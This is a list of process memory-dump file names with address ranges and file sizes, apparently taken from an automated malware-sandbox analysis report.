memory/1980-12-0x000002CCC1370000-0x000002CCC1380000-memory.dmpFilesize
64KB
-
memory/1980-11-0x000002CCC1370000-0x000002CCC1380000-memory.dmpFilesize
64KB
-
memory/1980-51-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/1980-16-0x000002CCC39E0000-0x000002CCC39EA000-memory.dmpFilesize
40KB
-
memory/1980-15-0x000002CCC3A00000-0x000002CCC3A12000-memory.dmpFilesize
72KB
-
memory/1980-14-0x000002CCC39C0000-0x000002CCC39D4000-memory.dmpFilesize
80KB
-
memory/1980-13-0x000002CCC3940000-0x000002CCC3966000-memory.dmpFilesize
152KB
-
memory/1980-10-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/1980-0-0x000002CCC3490000-0x000002CCC34B2000-memory.dmpFilesize
136KB
-
memory/3552-68-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/3552-64-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/3552-66-0x0000028B74DF0000-0x0000028B74E16000-memory.dmpFilesize
152KB
-
memory/3552-65-0x0000028B72B50000-0x0000028B72B60000-memory.dmpFilesize
64KB
-
memory/3580-150-0x0000000074D40000-0x00000000754F0000-memory.dmpFilesize
7.7MB
-
memory/3580-147-0x0000000074D40000-0x00000000754F0000-memory.dmpFilesize
7.7MB
-
memory/4904-116-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/4904-125-0x00000000057D0000-0x00000000057DA000-memory.dmpFilesize
40KB
-
memory/4904-126-0x0000000074D40000-0x00000000754F0000-memory.dmpFilesize
7.7MB
-
memory/4904-127-0x0000000002920000-0x0000000002930000-memory.dmpFilesize
64KB
-
memory/4904-124-0x0000000005640000-0x00000000056D2000-memory.dmpFilesize
584KB
-
memory/4904-123-0x0000000005A10000-0x0000000005FB4000-memory.dmpFilesize
5.6MB
-
memory/4904-122-0x0000000002920000-0x0000000002930000-memory.dmpFilesize
64KB
-
memory/4904-121-0x0000000074D40000-0x00000000754F0000-memory.dmpFilesize
7.7MB
-
memory/5068-133-0x00000294183A0000-0x00000294183B0000-memory.dmpFilesize
64KB
-
memory/5068-132-0x00000294183A0000-0x00000294183B0000-memory.dmpFilesize
64KB
-
memory/5068-131-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB
-
memory/5068-148-0x00007FFB7E6F0000-0x00007FFB7F1B1000-memory.dmpFilesize
10.8MB